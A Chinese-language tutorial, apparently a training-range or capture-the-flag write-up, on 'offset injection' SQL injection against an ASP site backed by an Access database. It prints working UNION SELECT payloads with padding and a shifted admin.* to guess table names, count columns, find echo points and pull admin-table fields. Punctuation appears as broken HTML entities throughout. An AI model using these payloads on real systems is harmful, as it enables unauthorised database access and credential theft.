WebAccess偏移溢注

之前的查询数据都是先表名&＃xff0c;再字段…但是在Access数据库中&＃xff0c;可没有什么“系统自带库”&＃xff0c;这个时候&＃xff0c;哼哼&＃xff0c;就要来点花活了
丑话说在前面&＃xff0c;Access中的表名是无解的&＃xff0c;要么跑字典&＃xff0c;要么猜

选中&＃xff1a;库.表.字段
*&＃xff1a;通配符&＃xff0c;表示所有
表.*&＃xff1a;所有字段

偏移溢注&＃xff1a;当原表字段大于我要查询的表的字段的时候&＃xff0c;就要用到偏移溢注

是不是觉得我没说明白&＃xff0c;来感受一下&＃xff1a;

select * from login where username&＃61;&＃39;$username&＃39; //假设 login 表 6 个字段
union
select 1,2,admin.* from admin; //假设 admin 表 4 个字段


可以用1,2来补位&＃xff0c;更甚之移动admin.*的位置&＃xff01;&＃xff01;
这就叫偏移注入&＃xff01;

拿到一个做的跟非法网站一样的东西&＃xff0c;随便点一个进去看一下

看到是ASP写的&＃xff0c;而且有GET传参&＃xff0c;可以在COOKIE上动点手脚

尝试注入&＃xff1a;id&＃61;171&＃39; -- qwe

不能闭合&＃xff0c;不闭合试试&＃xff0c;直接排字段&＃xff1a;id&＃61;171 order by 1

果然没有闭合&＃xff0c;最后查出来是十个字段&＃xff0c;猜测表名是admin&＃xff0c;而且测出来admin表的字段比这个页面的字段数还要大&＃xff0c;就在这几个页面里试&＃xff0c;最终找到比admin表的字段大的

发现id&＃61;105这个页面有26个字段&＃xff0c;查一下回显点&＃xff1a;id&＃61;105 and 1&＃61;2 union select 11111,21111,31111,41111,51111,61111,71111,81111,91111,101111,111111,121111,131111,141111,151111,161111,171111,181111,191111,201111,211111,221111,231111,241111,251111,261111 from admin
发现回显点为&＃xff1a;3&＃xff0c;5&＃xff0c;7&＃xff0c;25

这里注意&＃xff0c;如果不写and 1&＃61;2是正常页面&＃xff0c;写了就不会回显正常页面而输出我们想看到的回显点&＃xff01;
要检查源码&＃xff01;它里面也有输出点呢&＃xff01;&＃xff01;&＃xff01;

现在开始将26替换为admin.*&＃xff0c;以此来判断一下admin表里有几个字段&＃xff0c;逐次删除位数&＃xff0c;直到页面正常回显&＃xff1a;id&＃61;105 union select 1,2,31111,4,51111,6,71111,8,9,10,admin.* from admin

看来admin表有16个字段&＃xff0c;而且倒数第二个字段是" "&＃xff0c;接下来就是偏移溢注&＃xff0c;其实就是把admin.*一直向左移&＃xff0c;查敏感字段id&＃61;105 union select 1,2,31111,4,51111,6,71111,8,9,admin.*,26 from admin

移了一下flag就来啦&＃xff0c;耶比耶比